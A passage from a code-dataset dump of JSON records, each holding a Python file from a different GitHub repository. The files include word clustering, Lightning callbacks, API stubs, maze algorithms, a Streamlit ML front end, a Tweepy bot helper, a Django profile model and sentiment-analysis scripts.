runOchClustering(lang)\n \n # Print the clusters\n printNewClusters(outputFileName, lang)\n \nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--inputfile\", type=str, help=\"Input file containing word bigram and unigram counts\")\n parser.add_argument(\"-n\", \"--numclus\", type=int, help=\"No. of clusters to be formed\")\n parser.add_argument(\"-o\", \"--outputfile\", type=str, help=\"Output file with word clusters\")\n parser.add_argument(\"-t\", \"--type\", type=int, choices=[0, 1], default=1, help=\"type of cluster initialization\")\n parser.add_argument(\"-m\", \"--morphweight\", type=float, default=0, help=\"weight given to morphology factor\")\n \n args = parser.parse_args()\n \n inputFileName = args.inputfile\n numClusInit = args.numclus\n outputFileName = args.outputfile\n typeClusInit = args.type\n morphWeight = args.morphweight\n \n main(inputFileName, outputFileName, numClusInit, typeClusInit, morphWeight)","repo_name":"mfaruqui/word-clustering","sub_path":"monoMain.py","file_name":"monoMain.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"20014147398","text":"import logging\nimport os\nimport numpy as np\nfrom pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint\n\n\ndef count_trainable_parameters(model):\n model_parameters = filter(lambda p: p.requires_grad, model.parameters())\n params = sum([np.prod(p.size()) for p in model_parameters])\n return params\n\n\nlogger = logging.getLogger(__name__)\n\ndef get_checkpoint_callback(output_dir, metric, save_top_k=1, lower_is_better=False):\n if metric == \"loss\":\n exp = \"{val_avg_loss:.4f}-{epoch_count}\"\n\n else:\n raise NotImplementedError(\n f\"seq2seq callbacks only support loss, got {metric}, You can make your own by adding to this function.\"\n )\n\n checkpoint_callback = ModelCheckpoint(\n filepath=os.path.join(output_dir, exp),\n monitor=f\"val_{metric}\",\n mode=\"min\" if \"loss\" in metric else \"max\",\n save_top_k=save_top_k,\n period=0, # maybe save a checkpoint every time val is run, not just end of epoch.\n )\n return checkpoint_callback\n\n\ndef get_early_stopping_callback(metric, patience):\n return EarlyStopping(\n monitor=f\"val_{metric}\", # does this need avg?\n mode=\"min\" if \"loss\" in metric else \"max\",\n patience=patience,\n verbose=True,\n )\n","repo_name":"rattlesnakey/Definition-Gneration-Contrastive","sub_path":"src/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"7001646376","text":"import collections.abc\nimport typing\n\nimport httplib2 # type: ignore\nimport typing_extensions\n\nimport googleapiclient.discovery\nimport googleapiclient.http # type: ignore\n\nfrom .schemas import *\n\n_list = list\n\n@typing.type_check_only\nclass StreetViewPublishResource(googleapiclient.discovery.Resource):\n @typing.type_check_only\n class PhotoResource(googleapiclient.discovery.Resource):\n def create(\n self, *, body: Photo = ..., **kwargs: typing.Any\n ) -> PhotoHttpRequest: ...\n def delete(self, *, photoId: str, **kwargs: typing.Any) -> EmptyHttpRequest: ...\n def get(\n self,\n *,\n photoId: str,\n languageCode: str = ...,\n view: typing_extensions.Literal[\"BASIC\", \"INCLUDE_DOWNLOAD_URL\"] = ...,\n **kwargs: typing.Any\n ) -> PhotoHttpRequest: ...\n def startUpload(\n self, *, body: Empty = ..., **kwargs: typing.Any\n ) -> UploadRefHttpRequest: ...\n def update(\n self,\n *,\n id: str,\n body: Photo = ...,\n updateMask: str = ...,\n **kwargs: typing.Any\n ) -> PhotoHttpRequest: ...\n\n @typing.type_check_only\n class PhotoSequenceResource(googleapiclient.discovery.Resource):\n def create(\n self,\n *,\n body: PhotoSequence = ...,\n inputType: typing_extensions.Literal[\n \"INPUT_TYPE_UNSPECIFIED\", \"VIDEO\", \"XDM\"\n ] = ...,\n **kwargs: typing.Any\n ) -> OperationHttpRequest: ...\n def delete(\n self, *, sequenceId: str, **kwargs: typing.Any\n ) -> EmptyHttpRequest: ...\n def get(\n self,\n *,\n sequenceId: str,\n filter: str = ...,\n view: typing_extensions.Literal[\"BASIC\", \"INCLUDE_DOWNLOAD_URL\"] = ...,\n **kwargs: typing.Any\n ) -> OperationHttpRequest: ...\n def startUpload(\n self, *, body: Empty = ..., **kwargs: typing.Any\n ) -> UploadRefHttpRequest: ...\n\n @typing.type_check_only\n class PhotoSequencesResource(googleapiclient.discovery.Resource):\n def list(\n self,\n *,\n filter: str = ...,\n pageSize: int = ...,\n pageToken: str = ...,\n **kwargs: typing.Any\n ) -> ListPhotoSequencesResponseHttpRequest: ...\n def list_next(\n self,\n previous_request: ListPhotoSequencesResponseHttpRequest,\n previous_response: ListPhotoSequencesResponse,\n ) -> ListPhotoSequencesResponseHttpRequest | None: ...\n\n @typing.type_check_only\n class PhotosResource(googleapiclient.discovery.Resource):\n def batchDelete(\n self, *, body: BatchDeletePhotosRequest = ..., **kwargs: typing.Any\n ) -> BatchDeletePhotosResponseHttpRequest: ...\n def batchGet(\n self,\n *,\n languageCode: str = ...,\n photoIds: str | _list[str] = ...,\n view: typing_extensions.Literal[\"BASIC\", \"INCLUDE_DOWNLOAD_URL\"] = ...,\n **kwargs: typing.Any\n ) -> BatchGetPhotosResponseHttpRequest: ...\n def batchUpdate(\n self, *, body: BatchUpdatePhotosRequest = ..., **kwargs: typing.Any\n ) -> BatchUpdatePhotosResponseHttpRequest: ...\n def list(\n self,\n *,\n filter: str = ...,\n languageCode: str = ...,\n pageSize: int = ...,\n pageToken: str = ...,\n view: typing_extensions.Literal[\"BASIC\", \"INCLUDE_DOWNLOAD_URL\"] = ...,\n **kwargs: typing.Any\n ) -> ListPhotosResponseHttpRequest: ...\n def list_next(\n self,\n previous_request: ListPhotosResponseHttpRequest,\n previous_response: ListPhotosResponse,\n ) -> ListPhotosResponseHttpRequest | None: ...\n\n def new_batch_http_request(\n self,\n callback: collections.abc.Callable[\n [\n str,\n googleapiclient.http.HttpRequest,\n googleapiclient.errors.HttpError | None,\n ],\n typing.Any,\n ]\n | None = ...,\n ) -> googleapiclient.http.BatchHttpRequest: ...\n def photo(self) -> PhotoResource: ...\n def photoSequence(self) -> PhotoSequenceResource: ...\n def photoSequences(self) -> PhotoSequencesResource: ...\n def photos(self) -> PhotosResource: ...\n\n@typing.type_check_only\nclass BatchDeletePhotosResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> BatchDeletePhotosResponse: ...\n\n@typing.type_check_only\nclass BatchGetPhotosResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> BatchGetPhotosResponse: ...\n\n@typing.type_check_only\nclass BatchUpdatePhotosResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> BatchUpdatePhotosResponse: ...\n\n@typing.type_check_only\nclass EmptyHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> Empty: ...\n\n@typing.type_check_only\nclass ListPhotoSequencesResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> ListPhotoSequencesResponse: ...\n\n@typing.type_check_only\nclass ListPhotosResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> ListPhotosResponse: ...\n\n@typing.type_check_only\nclass OperationHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> Operation: ...\n\n@typing.type_check_only\nclass PhotoHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> Photo: ...\n\n@typing.type_check_only\nclass UploadRefHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> UploadRef: ...\n","repo_name":"henribru/google-api-python-client-stubs","sub_path":"googleapiclient-stubs/_apis/streetviewpublish/v1/resources.pyi","file_name":"resources.pyi","file_ext":"pyi","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"54"} +{"seq_id":"43248965977","text":"import random\r\n\r\n\r\n\r\ndef binary_tree(Grid):\r\n \"\"\" \r\n Fast, efficient, and simple\r\n Strongly biased toward diagonals (here NE)\r\n \"\"\"\r\n for cell in Grid.cells:\r\n neighbors = []\r\n if cell.north_cell is not None:\r\n neighbors.append(cell.north_cell)\r\n if cell.east_cell is not None:\r\n neighbors.append(cell.east_cell)\r\n if neighbors:\r\n neighbor = random.choice(neighbors)\r\n if neighbor:\r\n cell.dig(neighbor)\r\n\r\n\r\ndef aldous_broder(Grid):\r\n \"\"\"\r\n Perfect randomly maze\r\n Long to finish in big mazes ++\r\n \"\"\"\r\n actual_cell = random.choice(Grid.cells)\r\n not_yet_visited = len(Grid.cells)-1\r\n\r\n while not_yet_visited > 0:\r\n neighbors = actual_cell.neighbors\r\n neighbor = random.choice(neighbors)\r\n if not neighbor.links: #If list is not empty (empty = False)\r\n actual_cell.dig(neighbor)\r\n not_yet_visited -= 1\r\n actual_cell = neighbor\r\n\r\ndef hunt_and_kill(Grid):\r\n \"\"\"\r\n Few dead-ends, long rivers\r\n Low memory, but slow\r\n \"\"\"\r\n actual_cell = random.choice(Grid.cells)\r\n\r\n while actual_cell is not None:\r\n not_visited_neighbors = [neighbor for neighbor in actual_cell.neighbors if len(neighbor.links) == 0]\r\n if not_visited_neighbors:\r\n neighbor = random.choice(not_visited_neighbors)\r\n actual_cell.dig(neighbor)\r\n actual_cell = neighbor\r\n else:\r\n actual_cell = None\r\n for i in Grid.cells:\r\n visited_neighbors = [neighbor for neighbor in i.neighbors if len(neighbor.links) > 0]\r\n if not i.links and visited_neighbors:\r\n actual_cell = i\r\n neighbor = random.choice(visited_neighbors)\r\n actual_cell.dig(neighbor)\r\n break \r\n\r\n\r\n\r\n# Dict containing the list of algorithms \r\ncreation_algorithms = {\r\n \"bt\":binary_tree, \r\n \"ab\":aldous_broder, \r\n \"hk\":hunt_and_kill,\r\n }\r\n \r\n","repo_name":"Aytan-sudo/mazes_for_python","sub_path":"algo_maze.py","file_name":"algo_maze.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24552110148","text":"import numpy as np\n\ndef euclidean_distance(X, Y):\n m = X.shape[0]\n n = Y.shape[0]\n X_dots = (X * X).sum(axis=1).reshape((m, 1)) * np.ones(shape=(1, n))\n Y_dots = (Y * Y).sum(axis=1) * np.ones(shape=(m, 1))\n return np.sqrt(X_dots + Y_dots - 2 * X.dot(Y.T))\n\n\ndef cosine_distance(X, Y):\n dotted = X.dot(Y.T)\n matrix_norms = np.linalg.norm(X, axis=1)\n vector_norm = np.linalg.norm(Y, axis=1)\n matrix_vector_norms = np.outer(matrix_norms, vector_norm)\n neighbors = 1.0 - np.divide(dotted, matrix_vector_norms)\n return neighbors\n","repo_name":"punditjava/machine_learning","sub_path":"KNN_Classifier/distances.py","file_name":"distances.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14975726417","text":"import csv\n\nwith open('rent_converted.tsv',encoding = 'utf-8') as f:\n reader = csv.reader(f,delimiter='\\t')\n next(reader)\n for row in reader:\n prefecture = ['13']\n ward = ['204']\n station = ['242','4987','4986']\n roomtype = ['10','20','25','30']\n\n if (row[9] in prefecture)and (row[10] in ward) and(row[12] in station) and (row[34] in roomtype):\n print(row)\n with open('mitaka.csv', 'a', encoding='utf-8_sig') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow(row)\n csvFile.close()\n","repo_name":"nnao01294/mitaka_test","sub_path":"mitaka_csv.py","file_name":"mitaka_csv.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2264394913","text":"\"\"\"\nRuns the streamlit front end for the mlexec demo.\n\"\"\"\nimport pandas as pd\nimport streamlit as st\nfrom mlexec import MLExecutor\n\nMODEL_OPTIONS = {\"lgb\",\"svm\",\"nn\",\"lr\",\"rf\",\"xgb\",\"knn\"}\nTASK_OPTIONS = {\"classification\",\"regression\"}\nMETRIC_OPTIONS = {\"classification\": [\"matthews_corrcoef\",\"misclassification_cost\",\n \"accuracy\", \"recall\", \"precision\",\"f1_score\",\"auc_roc\",\"auc_pr\"],\n \"regression\": [\"rmse\",\"r2\",\"mae\",\"mape\"]}\nCV_OPTIONS = [\"basic\",\"nested\",\"\"]\n\ndef run_mlexec(df_: pd.DataFrame,\n target_col:str,\n task:str=\"classification\",\n model_list:list=[\"lgb\",\"rf\",\"xgb\"],\n metric:str=\"\",\n excluded_cols:list=[],\n n_fold:int=4,\n cv_type:str=\"basic\",\n num_config:int=10):\n \"\"\"Running MLexecutor using the input paramters provided by the user.\n\n Args:\n df_ (pd.DataFrame): The dataframe containing the dependent and independent variables. \\n\n target_col (str): The column which contains the value for the dependent variable. \\n\n task (str, optional): The task: `\"regression\"` or `\"classification\"`.\\n\n model_list (list, optional): List of models to tune. Defaults to [\"lgb\",\"rf\",\"xgb\"].\\n\n metric (str, optional): The metric with which the model should \\\n be compared.\\n\n excluded_cols (list, optional): Columns which should not be used \\\n in the modelling process.\\n\n n_fold (int, optional): Number of folds to be used in k-fold cross \\\n validation.\\n\n cv_type (str, optional): Type of cross validation to perform.\\n\n num_config (int, optional): Number of model configurations to run during tuning.\n \"\"\"\n mle = MLExecutor(\n df_,\n target_col=target_col,\n task=task,\n model_list=model_list,\n metric=metric,\n exclude_cols=excluded_cols,\n cv=cv_type,\n n_fold=n_fold,\n max_evals=num_config,\n )\n st.write(\"Models executed successfully!\")\n st.balloons()\n st.dataframe(mle.val_results)\n st.dataframe(mle.test_results)\n\n\ndef take_user_inputs():\n \"\"\"\n Obtain user inputs to be passed to the MLExec object\n \"\"\"\n uploaded_file = st.file_uploader(\"Choose a tabular file to begin\")\n if uploaded_file:\n ## Reading as a pandas dataframe based on format\n suffix = uploaded_file.name.split(\".\")[-1]\n if suffix in [\"xlsx\",\"xls\"]:\n df_ = pd.read_excel(uploaded_file)\n elif suffix in [\"csv\",\"txt\",\"data\"]:\n df_ = pd.read_csv(uploaded_file)\n elif suffix in [\"pkl\"]:\n df_ = pd.read_pickle(uploaded_file)\n elif suffix in [\"json\"]:\n df_ = pd.read_json(uploaded_file)\n\n col_list = list(df_.columns)\n target_col = st.selectbox(\"Please select the target column\",\n col_list)\n excluded_cols = st.multiselect(\"please select columns to exclude (if any)\",\n col_list,\n default=[])\n task = st.selectbox(\"Please select ML task\",\n TASK_OPTIONS)\n model_list = st.multiselect(\"Please select models\",\n MODEL_OPTIONS,\n default=[\"lgb\",\"rf\",\"xgb\"])\n metric = st.selectbox(\"Please select a metric for model comparison\",\n METRIC_OPTIONS[task])\n cv_type = st.selectbox(\"Please cross validation method\",\n CV_OPTIONS)\n if cv_type:\n n_fold = st.slider('Number of k-fold in CV', 1, 10, 2)\n\n num_config = st.slider('Number of model configurations to tune',\n 5, 50, 5)\n response = st.button(\"Click to begin tuning\")\n\n if response:\n return {\"df_\": df_,\n \"target_col\": target_col,\n \"excluded_cols\": excluded_cols,\n \"task\": task,\n \"model_list\": model_list,\n \"metric\": metric,\n \"cv_type\": cv_type,\n \"n_fold\": n_fold,\n \"num_config\": num_config}\n\ndef main():\n \"\"\"\n Main function to handle user inputs, ML execution and displaying output\n \"\"\"\n user_inputs = take_user_inputs()\n\n if user_inputs:\n run_mlexec(**user_inputs)\n\nmain()\n","repo_name":"DivM11/mlexec_frontend","sub_path":"run_frontend.py","file_name":"run_frontend.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38610679741","text":"def binarySearch(arr, i, j, n, m):\n\t## Implementation\n\twhile i <= j:\n\n\t\tmid = i + ((j-i)//2)\n\t\tmid_row = mid // n\n\t\tmid_column = mid % n\n\t\tmid_element = arr[mid_row][mid_column]\n\n\t\tif mid_element == x:\n\t\t\treturn mid_row, mid_column\n\t\telif mid_element < x:\n\t\t\ti = mid + 1\n\t\telif mid_element > 1:\n\t\t\tj = mid -1\n\n\treturn -1\n\n## Driver Code\narr = [[1, 2, 3, 5], [7, 8, 10, 12], [14, 17, 18, 20]]\ni = 0 # Start index\nx = 17 # Search number\nn = len(arr[0]) # Number of columns\nm = len(arr) # Number of rows\nj = (m * n) - 1 # end index\n\nprint(binarySearch(arr, i, j, n, m))\n\n","repo_name":"sivayuvi79/DSA-Python","sub_path":"Array/BInarySearchOn2d.py","file_name":"BInarySearchOn2d.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35184141599","text":"\"\"\"\nProxy is a structural design pattern that lets you provide a substitute or \nplaceholder for another object. A proxy controls access to the original \nobject, allowing you to perform something either before or after the \nrequest gets through to the original object.\n\nInstead of using object X use proxy of X which will\ntake care for some additional stuff (security, logging... it can\ndo something before/after or during the main action where object X is used)\n\"\"\"\n\n\nclass GuildVault:\n\n def view(self, player):\n print('Player \"%s\" is viewing the guild vault' % player.name)\n\n\nclass ProxyGuildVault:\n\n def __init__(self, *args, **kwargs):\n self.guild_vault = GuildVault(*args, **kwargs)\n self.black_list_players = ['Mogka', 'Banana']\n\n def view(self, player):\n if player.name in self.black_list_players:\n print('!!! Player \"%s\" is not allowed to view '\n 'the guild vault !!!' % player.name)\n return\n\n self.guild_vault.view(player)\n\n\nclass Player:\n\n def __init__(self, name):\n self.name = name\n\n\ndef run():\n mogka = Player('Mogka')\n ra = Player('Ra')\n guild_vault = GuildVault()\n proxy_vault = ProxyGuildVault()\n\n players = [mogka, ra]\n print(' * plain vault')\n for player in players:\n guild_vault.view(player)\n\n print(' * proxy vault')\n for player in players:\n proxy_vault.view(player)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"dos09/PythonDesignPatterns","sub_path":"src/design_patterns/structural/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1990881217","text":"'''\nFirst Version: contents from subreddits\n'''\nimport configparser\nfrom collections import namedtuple\nimport tweepy\n\nTweet = namedtuple('Tweet', ['Primary', 'Second'])\n\n\nclass Twitter:\n '''\n class to load config info and send tweets\n '''\n\n def __init__(self):\n config = Twitter.__read_config()\n auth = tweepy.OAuthHandler(\n config['consumer_key'],\n config['consumer_secret'])\n auth.set_access_token(\n config['access_token'],\n config['access_token_secret'])\n self.__api = tweepy.API(auth)\n\n def send_tweet(self, message, reply_id=None):\n '''\n sends a tweet and prints any errors.\n '''\n try:\n if reply_id:\n status = self.__api.update_status(message, reply_id)\n else:\n status = self.__api.update_status(message)\n except tweepy.TweepError as tweep_error:\n print(tweep_error)\n return status\n\n @staticmethod\n def __read_config():\n '''\n reads from 'tweepy.ini' which must be in the working directory\n '''\n config = configparser.ConfigParser()\n config.read('tweepy.ini')\n return {key: config['bot1'][key] for key in config['bot1']}\n\n @staticmethod\n def __write_config(config_dict):\n '''\n write 'tweepy.ini' with updated values\n '''\n config = configparser.ConfigParser()\n config.read('tweepy.ini')\n for key in config_dict:\n config['bot1'][key] = config_dict[key]\n with open('tweepy.ini', 'w') as configfile:\n config.write(configfile)\n\n @staticmethod\n def refresh_access_token():\n '''\n interactive function that gets the access token and access token secret\n '''\n config = Twitter.__read_config()\n auth = tweepy.OAuthHandler(consumer_key=config['consumer_key'],\n consumer_secret=config['consumer_secret'])\n print('navigate to: ' + auth.get_authorization_url())\n print('return with the pin')\n pin = input('type the pin here:')\n auth.get_access_token(pin)\n config['access_token'] = auth.access_token\n config['access_token_secret'] = auth.access_token_secret\n Twitter.__write_config(config)\n return config\n","repo_name":"seanneal/tweetbot","sub_path":"twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30660607943","text":"from django.db import models\nfrom users.models import CustomUser\nimport uuid\n\n# Create your models here.\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(CustomUser, on_delete=models.CASCADE,related_name='userr')\n profile_id = models.UUIDField(default=uuid.uuid4)\n \n slug = models.SlugField(max_length=50)\n age = models.PositiveIntegerField()\n marital_status_choices = [\n ('NM', 'Never Married'),\n ('D', 'Divorced'),\n ('AD', 'Awaiting Divorce'),\n ]\n marital_status = models.CharField(\n max_length=5, choices=marital_status_choices)\n DOB = models.DateField()\n religion_choices = [\n ('H', 'Hindu'),\n ('M', 'Muslim'),\n ('C', 'Christian'),\n ('B', 'Buddhist'),\n ('S', 'Sikh'),\n ('J', 'Jain'),\n ('JW', 'Jewish'),\n ('O', 'Other'),\n ('N', 'No Religion'),\n ]\n religion = models.CharField(max_length=5, choices=religion_choices)\n # gotra\n location_choices = [\n ('achham', 'Achham'),\n ('arghakhanchi', 'Arghakhanchi'),\n ('baglung', 'Baglung'), ('baitadi', 'Baitadi'),\n ('bajhang', 'Bajhang'), ('bajura', 'Bajura'),('banke', 'Banke'), ('bara', 'Bara'),\n ('bardiya', 'Bardiya'), ('bhaktapur', 'Bhaktapur'), ('bhojpur', 'Bhojpur'),\n ('chitwan', 'Chitwan'), ('dadeldhura', 'Dadeldhura'), ('dailekh', 'Dailekh'),\n ('dang', 'Dang'), ('darchula', 'Darchula'), ('dhading', 'Dhading'),\n ('dhankuta', 'Dhankuta'),\n ('dhanusa', 'Dhanusa'), ('dolakha', 'Dolakha'),\n ('dolpa', 'Dolpa'), ('doti', 'Doti'),\n ('gorkha', 'Gorkha'), ('gulmi', 'Gulmi'), \n ('humla', 'Humla'), ('ilam', 'Ilam'), \n ('jajarkot', 'Jajarkot'), ('jhapa', 'Jhapa'),\n ('jumla', 'Jumla'), ('kailali', 'Kailali'),\n ('kalikot', 'Kalikot'), ('kanchanpur', 'Kanchanpur'),\n ('kapilvastu', 'Kapilvastu'), ('kaski', 'Kaski'), \n ('kathmandu', 'Kathmandu'), ('kavrepalanchok', 'Kavrepalanchok'),\n ('khotang', 'Khotang'), ('lalitpur', 'Lalitpur'), ('lamjung', 'Lamjung'),\n ('mahottari', 'Mahottari'), ('makawanpur', 'Makawanpur'), ('manang', 'Manang'), \n ('morang', 'Morang'), ('mugu', 'Mugu'), ('mustang', 'Mustang'), ('myagdi', 'Myagdi'),\n ('nawalpur', 'Nawalpur'), ('nuwakot', 'Nuwakot'), ('okhaldhunga', 'Okhaldhunga'),\n ('palpa', 'Palpa'), ('panchthar', 'Panchthar'), ('parasi', 'Parasi'), ('parbat', 'Parbat'),\n ('parsa', 'Parsa'), ('pyuthan', 'Pyuthan'), ('ramechhap', 'Ramechhap'), ('rasuwa', 'Rasuwa'),\n ('rautahat', 'Rautahat'), ('rolpa', 'Rolpa'), ('rukum', 'Rukum'),\n ('rukum paschim', 'Rukum Paschim'), ('rupandehi', 'Rupandehi'), ('salyan', 'Salyan'),\n ('sankhuwasabha', 'Sankhuwasabha'), ('saptari', 'Saptari'), ('sarlahi', 'Sarlahi'), \n ('sindhuli', 'Sindhuli'), ('sindhupalchok', 'Sindhupalchok'), ('siraha', 'Siraha'),\n ('solukhumbu', 'Solukhumbu'), ('sunsari', 'Sunsari'), ('surkhet', 'Surkhet'), \n ('syangja', 'Syangja'), ('tanahu', 'Tanahu'), ('taplejung', 'Taplejung'),\n ('terhathum', 'Terhathum'), ('udayapur', 'Udayapur')]\n\n \n location = models.CharField(max_length=20, choices=location_choices)\n family_type_choices = [\n ('J', 'Joint'),\n ('N', 'Nuclear'),\n ]\n family_type = models.CharField(max_length=1, choices=family_type_choices)\n Rashi_choices = [\n ('mesh', 'Mesh'),\n ('bris', 'Bris'),\n ('mithun', 'Mithun'),\n ('karkat', 'Karkat'),\n ('singha', 'Singha'),\n ('kanya', 'Kanya'),\n ('tula', 'Tula'),\n ('brischik', 'Brischik'),\n ('dhanu', 'Dhanu'),\n ('makar', 'Makar'),\n ('kumba', 'Kumba'),\n ('min', 'Min'),\n ]\n Rashi = models.CharField(max_length=10, choices=Rashi_choices)\n education_choices = [\n ('slc','Slc'),\n ('high School','High School'),\n ('bachelors','Bachelors'),\n ('master','Master'),\n ]\n education = models.CharField(max_length=20, choices=education_choices)\n\n\n\n def __str__(self):\n return self.user.username\n\n \n \n\n\n","repo_name":"Rupesh2056/Lagan-Gatho","sub_path":"userprofile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4660862175","text":"def nlp_sentiment():\n# Imports the Google Cloud client library\n\n\timport argparse\n\timport os\n\tfrom google.cloud import language\n\tfrom google.cloud.language import enums\n\tfrom google.cloud.language import types\n\tfrom google.oauth2 import service_account\n\n\tcreds = service_account.Credentials.from_service_account_file() # insert .json file path here including the .json file's name with double air quotes (\"\")\n\tclient = language.LanguageServiceClient(\n\t credentials=creds,\n\t )\n\n\t# The text to analyze\n\ttext = u'The Cloud Natural Language supports a variety of languages. These languages are specified within a request using the optional language parameter.'\n\t\n\tdocument = types.Document(\n\t\tcontent=text,\n\t\ttype=enums.Document.Type.PLAIN_TEXT)\n\n\t\t# Detects the sentiment of the text\n\tsentiment = client.analyze_sentiment(document=document).document_sentiment\n\n\tprint('Text: {}'.format(text))\n\tprint('Sentiment: {}, {}'.format(sentiment.score, sentiment.magnitude))\n\n\t\n\tsentences = text.split('.')\n\n\tscore = [0 for i in range(len(sentences))]\n\tmagnitude = [0 for i in range(len(sentences))]\n\n\tfor i in range(0,len(sentences)):\n\n\t\tdocument = types.Document(\n\t\t content=sentences[i],\n\t\t type=enums.Document.Type.PLAIN_TEXT)\n\n\t\t# Detects the sentiment of the text\n\t\tsentiment = client.analyze_sentiment(document=document).document_sentiment\n\n\t\tscore[i] = sentiment.score\n\t\tmagnitude[i] = sentiment.magnitude\n\n\n\tlargest_impact = max(score)\n\n\tselector = score.index(largest_impact)\n\n\tprint('Text: {}'.format(sentences[selector]))\n\tprint('is the sentence with largest sentiment score individually with a score of {}'.format(largest_impact))\n\n\treturn \n\nnlp_sentiment()","repo_name":"huda-irs/Project-2-Part-1b","sub_path":"nlp_sentiment.py","file_name":"nlp_sentiment.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7384288051","text":"import sys\nimport numpy as np\n\nsys.path.insert(len(sys.path), '../include/')\nfrom Qphase import *\n\n\n# Average the two-point function over the momenta for each Qsq,\n# flavor (ppm,pmm) and direction (fwd,bwd)\ndef average_twop(twop_raw,Qsq,twopInfo,avg_type=\"all\",pflv='',pdrc=''):\n\n Ntraj = twopInfo['Ntraj']\n T = twopInfo['T']\n nQsq = len(Qsq)\n \n twop = np.zeros((nQsq, Ntraj, T, 1),dtype=np.complex128) \n \n if(avg_type==\"all\"):\n twop_drct = []\n twop_drct_aver = []\n for msq in range(nQsq):\n twop_drct.append({})\n twop_drct_aver.append({})\n for drct in drct_list2pt:\n twop_drct[msq][drct] = []\n for flav in flav_list2pt:\n twop_drct[msq][drct].append( np.average(twop_raw[msq][(flav,drct)],axis=2) ) # Average over the momenta for each Qsq, for each flavor and direction\n \n twop_drct_aver[msq][drct] = np.average(twop_drct[msq][drct],axis=0) # Average over the flavors, for each Qsq and direction\n\n # Average over forward, backward directions\n for ic in range(Ntraj):\n for it in range(T):\n twop[msq][ic][it][0] = 0.5 * ( twop_drct_aver[msq]['fwd'][ic][it] - twop_drct_aver[msq]['bwd'][ic][(T-it)%T] )\n\n elif(avg_type==\"momenta\"):\n if(pflv=='' or pdrc==''):\n print( 'average_twop: Variables pflv and pdrc must be defined when avg_type = \"%s\"' % (avg_type) )\n sys.exit()\n\n print( 'average_twop: Averaging over momenta, flavor = %s , direction = %s' % (pflv,pdrc) )\n for msq in range(nQsq):\n twop[msq] = np.reshape( np.average(twop_raw[msq][(pflv,pdrc)],axis=2) , (Ntraj,T,1) ) # Average over the momenta for each Qsq, for flavor 'ppm' and direction 'fwd'\n\n \n return twop\n#---------------------------------------------------------------------------------------\n \n \n# Function which performs a constant fit\ndef constant_fit(values):\n\n Sy = sum( map(lambda x:x,values['val']/(values['err']**2)) ) # Sy = SUM_i val[i]/err[i]**2\n S = sum( map(lambda x:1.0/(x*x),values['err']) ) # S = SUM_i ( 1/err[i] )^2\n\n return Sy/S\n#---------------------------------------------------------------------------------------\n\n\n# Function which calculates the chi_square for a constant fit\ndef chisq_const(values, fit):\n\n return sum( map(lambda x:x,((values['val']-fit)/values['err'])**2) )\n#---------------------------------------------------------------------------------------\n","repo_name":"ckallidonis/Q-PHaSe","sub_path":"lib/Qphase_math.py","file_name":"Qphase_math.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13256496310","text":"from client import CifarClient, NUM_CLIENTS, 